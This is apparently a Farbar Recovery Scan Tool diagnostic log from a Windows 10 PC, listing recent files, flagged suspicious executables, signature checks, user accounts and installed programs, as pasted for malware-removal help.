2019-01-09 12:59 - 2019-01-01 07:16 - 005775872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2019-01-09 12:59 - 2019-01-01 07:15 - 005307392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2019-01-09 12:59 - 2019-01-01 07:15 - 000608768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2019-01-09 12:59 - 2019-01-01 07:14 - 004514816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2019-01-09 12:59 - 2019-01-01 07:13 - 001628160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2019-01-09 12:59 - 2019-01-01 07:12 - 000795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2019-01-09 12:59 - 2018-12-19 05:49 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2019-01-09 12:58 - 2019-01-01 14:50 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2019-01-09 12:58 - 2019-01-01 14:47 - 000225792 _____ (Microsoft Corporation) C:\WINDOWS\system32\windowslivelogin.dll
2019-01-09 12:58 - 2019-01-01 14:45 - 000714752 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcli.dll
2019-01-09 12:58 - 2019-01-01 14:45 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcredprov.dll
2019-01-09 12:58 - 2019-01-01 14:20 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windowslivelogin.dll
2019-01-09 12:58 - 2019-01-01 14:18 - 000500736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll
2019-01-09 12:58 - 2019-01-01 14:17 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcredprov.dll
2019-01-09 12:58 - 2019-01-01 08:14 - 001063224 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2019-01-09 12:58 - 2019-01-01 08:14 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2019-01-09 12:58 - 2019-01-01 08:14 - 000076088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2019-01-09 12:58 - 2019-01-01 08:13 - 000709728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2019-01-09 12:58 - 2019-01-01 08:13 - 000436024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2019-01-09 12:58 - 2019-01-01 08:13 - 000170808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2019-01-09 12:58 - 2019-01-01 08:12 - 000713272 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2019-01-09 12:58 - 2019-01-01 08:12 - 000128824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2019-01-09 12:58 - 2019-01-01 08:12 - 000043536 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2019-01-09 12:58 - 2019-01-01 07:48 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserexport.exe
2019-01-09 12:58 - 2019-01-01 07:48 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wanarp.sys
2019-01-09 12:58 - 2019-01-01 07:48 - 000079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Print.Workflow.Source.dll
2019-01-09 12:58 - 2019-01-01 07:46 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MicrosoftAccountTokenProvider.dll
2019-01-09 12:58 - 2019-01-01 07:46 - 000154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2019-01-09 12:58 - 2019-01-01 07:46 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2019-01-09 12:58 - 2019-01-01 07:45 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore.dll
2019-01-09 12:58 - 2019-01-01 07:44 - 001708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSPhotography.dll
2019-01-09 12:58 - 2019-01-01 07:41 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2019-01-09 12:58 - 2019-01-01 07:41 - 000895488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2019-01-09 12:58 - 2019-01-01 07:37 - 000880048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2019-01-09 12:58 - 2019-01-01 07:37 - 000581808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVideoDSP.dll
2019-01-09 12:58 - 2019-01-01 07:37 - 000381240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2019-01-09 12:58 - 2019-01-01 07:17 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MicrosoftAccountTokenProvider.dll
2019-01-09 12:58 - 2019-01-01 07:16 - 001361408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSPhotography.dll
2019-01-09 12:58 - 2019-01-01 07:16 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2019-01-09 12:58 - 2019-01-01 07:15 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2019-01-09 12:58 - 2019-01-01 07:15 - 000317440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore.dll
2019-01-09 12:58 - 2019-01-01 07:14 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2019-01-09 12:58 - 2019-01-01 07:14 - 000330752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.Workflow.dll
2019-01-09 12:58 - 2019-01-01 07:13 - 000594432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2019-01-09 12:58 - 2019-01-01 07:13 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2019-01-09 12:58 - 2019-01-01 07:12 - 001036288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2019-01-09 12:58 - 2019-01-01 07:12 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2019-01-09 12:58 - 2019-01-01 07:12 - 000516608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidprov.dll
2019-01-09 12:58 - 2019-01-01 06:23 - 000001310 _____ C:\WINDOWS\system32\tcbres.wim
2019-01-09 11:06 - 2019-01-09 11:06 - 000031454 _____ C:\Users\ulol\Desktop\The Big Bang Theory - 12x11 - The Paintball Scattering.SVA.English.HI.C.orig.Addic7ed.com.srt
2019-01-07 22:58 - 2019-01-07 22:58 - 000076780 _____ C:\ProgramData\agent.update.1546898284.bdinstall.v2.bin
2019-01-07 21:28 - 2019-01-07 21:37 - 168596427 _____ C:\Users\ulol\Desktop\The.Big.Bang.Theory.S12E11.HDTV.x264-SVA[eztv].mkv
2019-01-07 20:50 - 2018-10-04 22:40 - 000359584 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\Gemma.sys
2019-01-07 20:47 - 2019-01-09 19:03 - 000000000 ____D C:\Program Files\Bitdefender Antivirus Free
2019-01-07 19:45 - 2019-01-11 14:41 - 000000000 ____D C:\ProgramData\Bitdefender
2019-01-07 19:45 - 2018-10-09 14:07 - 000294000 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\edrsensor.sys
2019-01-07 19:44 - 2018-08-22 11:43 - 000357768 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bddci.sys
2019-01-07 19:41 - 2019-01-07 19:41 - 000000000 ____D C:\Users\ulol\AppData\Roaming\QuickScan
2019-01-07 19:36 - 2019-01-07 19:36 - 000103988 _____ C:\ProgramData\agent.1546886203.bdinstall.v2.bin
2019-01-07 19:36 - 2019-01-07 19:36 - 000000000 ____D C:\ProgramData\Bitdefender Agent
2019-01-07 19:34 - 2019-01-07 19:34 - 000000085 _____ C:\WINDOWS\wininit.ini
2019-01-07 19:24 - 2019-01-07 20:33 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2019-01-07 19:24 - 2019-01-07 19:34 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2019-01-07 19:24 - 2019-01-07 19:24 - 000000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2019-01-02 20:51 - 2019-01-02 21:35 - 788517376 _____ C:\Users\ulol\Downloads\Skryta-identita-2006-DVDRip-cz-DABING.avi
2019-01-01 22:49 - 2019-01-01 23:30 - 734048256 _____ C:\Users\ulol\Downloads\Ja Robot - I, Robot (2004) cz dabing.avi
2018-12-25 12:28 - 2018-12-25 14:18 - 1998800896 _____ C:\Users\ulol\Downloads\The-Shining---Osvícení---horor-(1980)-cz.titulky-OD-SOUČKA-TOMÁŠE.avi
2018-12-25 12:22 - 2018-12-25 14:03 - 1109600935 _____ C:\Users\ulol\Downloads\Motýlek (Papillon) 1973(S.McQueen D.Hoffman) bombuj.mp4
2018-12-20 14:07 - 2018-12-14 08:25 - 001035256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2018-12-20 14:07 - 2018-12-14 07:55 - 003396608 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2018-12-20 14:07 - 2018-12-14 07:54 - 006032384 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2018-12-20 14:07 - 2018-12-14 07:52 - 001826816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2018-12-20 14:06 - 2018-12-14 08:29 - 001130760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2018-12-20 14:06 - 2018-12-14 08:21 - 001457240 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2018-12-20 14:06 - 2018-12-14 08:21 - 001257672 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2018-12-20 14:06 - 2018-12-14 08:21 - 001140480 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2018-12-20 14:06 - 2018-12-14 08:21 - 001098064 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2018-12-20 14:06 - 2018-12-14 08:21 - 000982912 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2018-12-20 14:06 - 2018-12-14 08:10 - 001295360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2018-12-20 14:06 - 2018-12-14 08:07 - 000669696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2018-12-20 14:06 - 2018-12-14 07:55 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2018-12-20 14:06 - 2018-12-14 07:54 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2018-12-20 14:06 - 2018-12-14 07:52 - 002173440 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2018-12-20 14:06 - 2018-12-14 07:51 - 001551360 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2018-12-20 14:06 - 2018-12-14 07:50 - 000776192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2018-12-13 19:20 - 2019-01-11 23:34 - 000730616 _____ C:\WINDOWS\system32\perfh007.dat
2018-12-13 19:20 - 2019-01-11 23:34 - 000149266 _____ C:\WINDOWS\system32\perfc007.dat
2018-12-13 19:20 - 2018-12-12 19:23 - 000306166 _____ C:\WINDOWS\system32\perfi007.dat
2018-12-13 19:20 - 2018-12-12 19:23 - 000040520 _____ C:\WINDOWS\system32\perfd007.dat
2018-12-13 19:14 - 2018-12-13 19:14 - 000000000 ____D C:\WINDOWS\SysWOW64\de
2018-12-13 19:14 - 2018-12-13 19:14 - 000000000 ____D C:\WINDOWS\system32\de

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-12 00:19 - 2018-04-11 22:04 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2019-01-12 00:18 - 2018-05-21 21:05 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-01-12 00:03 - 2018-04-12 00:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-01-12 00:02 - 2018-05-21 20:39 - 000000000 ____D C:\Users\ulol
2019-01-11 23:34 - 2018-05-21 20:39 - 002569078 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-01-11 23:34 - 2018-04-12 16:50 - 000716276 _____ C:\WINDOWS\system32\perfh005.dat
2019-01-11 23:34 - 2018-04-12 16:50 - 000144534 _____ C:\WINDOWS\system32\perfc005.dat
2019-01-11 23:34 - 2018-04-12 00:36 - 000000000 ____D C:\WINDOWS\INF
2019-01-11 23:13 - 2018-05-21 20:32 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-01-11 22:43 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\NDF
2019-01-11 18:07 - 2018-04-12 00:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-01-11 18:07 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-01-11 14:35 - 2017-12-19 23:57 - 000000000 ____D C:\Users\ulol\AppData\Local\Packages
2019-01-11 13:31 - 2017-02-01 18:08 - 000000000 ___HD C:\$SysReset
2019-01-11 12:32 - 2017-02-01 23:40 - 000000000 ____D C:\Users\ulol\.smplayer
2019-01-11 11:55 - 2017-02-13 11:53 - 000000000 ____D C:\Users\ulol\AppData\Roaming\vlc
2019-01-10 17:14 - 2017-10-18 10:44 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-01-09 19:09 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\TextInput
2019-01-09 19:09 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\bcastdvr
2019-01-09 18:25 - 2018-12-07 17:47 - 000000000 ____D C:\Users\ulol\Downloads\vikings s05
2019-01-09 13:11 - 2017-02-01 23:48 - 000000000 ____D C:\WINDOWS\system32\MRT
2019-01-09 13:08 - 2018-04-12 00:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-01-09 13:08 - 2017-02-01 23:48 - 132790320 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2019-01-03 18:04 - 2017-02-01 23:43 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2019-01-02 20:41 - 2018-11-15 17:52 - 000835480 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2019-01-02 20:41 - 2018-11-15 17:52 - 000179600 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2018-12-27 15:49 - 2018-11-21 19:19 - 000000000 ____D C:\Users\ulol\Downloads\Outlaw King (2018) 720p WEBRip x264 750MB (nItRo)-XpoZ
2018-12-25 12:15 - 2018-09-27 08:38 - 000000000 ____D C:\Users\ulol\Downloads\South.Park.S22
2018-12-23 15:52 - 2018-10-15 12:32 - 000000000 ____D C:\WINDOWS\Minidump
2018-12-22 09:09 - 2018-04-11 16:08 - 000000000 ____D C:\Users\ulol\AppData\Local\WiFi Guard
2018-12-21 10:17 - 2017-02-01 21:32 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2018-12-18 11:27 - 2017-02-01 21:40 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-12-15 12:56 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\en-GB
2018-12-15 12:56 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\en-GB
2018-12-13 20:15 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2018-12-13 20:06 - 2017-12-20 12:46 - 000000000 ___RD C:\Users\ulol\3D Objects
2018-12-13 20:06 - 2017-02-01 21:29 - 000000000 __RHD C:\Users\Public\AccountPictures
2018-12-13 19:20 - 2018-05-21 20:31 - 000401184 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2018-12-13 19:15 - 2018-04-12 16:51 - 000000000 ____D C:\WINDOWS\OCR
2018-12-13 19:14 - 2018-05-20 21:45 - 000000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\winrm
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\WCN
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\slmgr
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\Printing_Admin_Scripts
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\winrm
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\WCN
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\slmgr
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\Printing_Admin_Scripts
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\F12
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\dsc
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___RD C:\Program Files\Windows Defender
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\MUI
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\com
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\oobe
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\MUI
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\migwiz
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\com
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\IME
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\Help
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files\Common Files\system
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2018-12-13 19:14 - 2018-04-11 22:04 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2018-12-13 19:14 - 2018-04-11 22:04 - 000000000 ____D C:\WINDOWS\system32\Dism
2018-12-13 19:14 - 2018-04-11 22:04 - 000000000 ____D C:\WINDOWS\servicing
2018-12-13 19:13 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\ShellComponents
2018-12-13 12:03 - 2017-02-01 21:49 - 000000000 ____D C:\Users\ulol\Desktop\cool
2018-12-13 09:09 - 2018-05-22 10:32 - 000000000 ____D C:\Users\ulol\AppData\Local\PlaceholderTileLogoFolder

==================== Files in the root of some directories =======

2019-01-10 17:29 - 2019-01-10 17:29 - 000000004 _____ () C:\ProgramData\ext.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000004 _____ () C:\ProgramData\lock.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000008 _____ () C:\ProgramData\ts.dat
2017-09-26 07:46 - 2016-08-07 17:04 - 000000422 _____ () C:\Program Files (x86)\update-RiseTombRider.bat
2017-09-26 07:46 - 2013-10-13 06:47 - 000000732 _____ () C:\Program Files (x86)\visit-www.nosteam.ro.html
1601-01-03 21:26 - 1601-01-03 21:26 - 000060416 ____N (Microsoft Corporation) C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe
2019-01-11 11:20 - 2019-01-11 11:20 - 006161408 _____ () C:\Users\ulol\AppData\Local\dump007.dat
2017-08-29 16:47 - 2017-08-29 16:47 - 000008963 _____ () C:\Users\ulol\AppData\Local\recently-used.xbel
2019-01-11 23:01 - 2019-01-11 23:02 - 000007593 _____ () C:\Users\ulol\AppData\Local\Resmon.ResmonCfg
1601-01-03 21:26 - 1601-01-03 21:26 - 000178688 ____N (Microsoft Corporation) C:\Users\ulol\AppData\Local\UeaYTEArbi.exe
2019-01-10 17:29 - 2019-01-10 17:29 - 000000003 _____ () C:\Users\ulol\AppData\Local\wbem.ini

Some files in TEMP:
====================
2019-01-10 18:14 - 2019-01-12 00:06 - 000000000 ____D () C:\Users\ulol\AppData\Local\Temp\IE8Shims.dll
2019-01-10 17:29 - 2019-01-10 17:29 - 013205167 _____ (MAL ) C:\Users\ulol\AppData\Local\Temp\neyparstfp3.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-05-21 20:31

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28.09.2018
Ran by Martin (12-01-2019 00:03:25)
Running from C:\Users\ulol\Desktop
Windows 10 Home Version 1803 17134.523 (X64) (2018-05-21 20:07:15)
Boot Mode: Safe Mode (minimal)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-195099987-321758953-278711717-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-195099987-321758953-278711717-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-195099987-321758953-278711717-1000 - Limited - Disabled) => C:\Users\defaultuser0
Guest (S-1-5-21-195099987-321758953-278711717-501 - Limited - Disabled)
Martin (S-1-5-21-195099987-321758953-278711717-1001 - Administrator - Enabled) => C:\Users\ulol
WDAGUtilityAccount (S-1-5-21-195099987-321758953-278711717-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 19.010.20069 - Adobe Systems Incorporated)
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.7.320.8504 - BlueStack Systems, Inc.)
Catalyst Control Center Next Localization BR (HKLM\...\{585A6A74-1DED-8DA0-32F1-F5EFA485DFB1}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{2CEBB6AA-EC39-DFF2-1F5B-9A98301C4DAB}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{F05F0B6E-9999-55D0-C323-D06DF0E2B59F}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{CBABB5FD-BD69-8969-729A-5659E11D9518}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{98527BF3-A8E0-B8CF-7297-436B714FC576}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{D6CD1B25-53E6-C2F8-FA99-F89138A9C86F}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{487C3865-3005-F04A-FBA4-F4239E02A847}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{D80AD200-548C-B62B-32AE-BF3CD7AA7EA2}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{D21BFF5C-51AA-4C15-1C91-6A1087FDC373}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{A0649E20-C57C-DCFA-AE1B-1CE1CB9D98A8}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{35F79A5D-00E2-8C19-D929-2E85DEA4252D}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{04F0FFCB-D9A5-2332-2697-CA47C0424AF2}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{47F2FFDC-3D6A-CED6-0B54-6E7082D5B29B}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{5608D1B6-6483-9FA3-7297-C2CFC3FCE747}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{1FCA484A-5A9E-9C91-F050-257D1F311A0C}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{D8FB03AE-A326-0C12-AC47-B898FE73FA94}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{F7876D2E-CDCD-CE53-0E88-995B57A94B58}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{3BAB5AC8-EF35-FED0-BCEB-9306D05EDE1C}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{746E086C-023A-A79C-DBE1-062E773FF6C8}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{1C44BB26-1941-DB44-D5E8-C455F89EE6E6}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{BE7F26CB-6E91-7673-7130-80C36FBF13DE}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Common Desktop Agent (HKLM\...\{031A0E14-0413-4C97-9772-2639B782F46F}) (Version: 1.62.0 - OEM) Hidden
GIMP 2.8.22 (HKLM\...\GIMP-2_is1) (Version: 2.8.22 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
HiSuite (HKLM-x32\...\Hi Suite) (Version: 9.0.2.301 - Huawei Technologies Co.,Ltd)
HitmanPro 3.8 (HKLM\...\HitmanPro38) (Version: 3.8.0.295 - SurfRight B.V.)
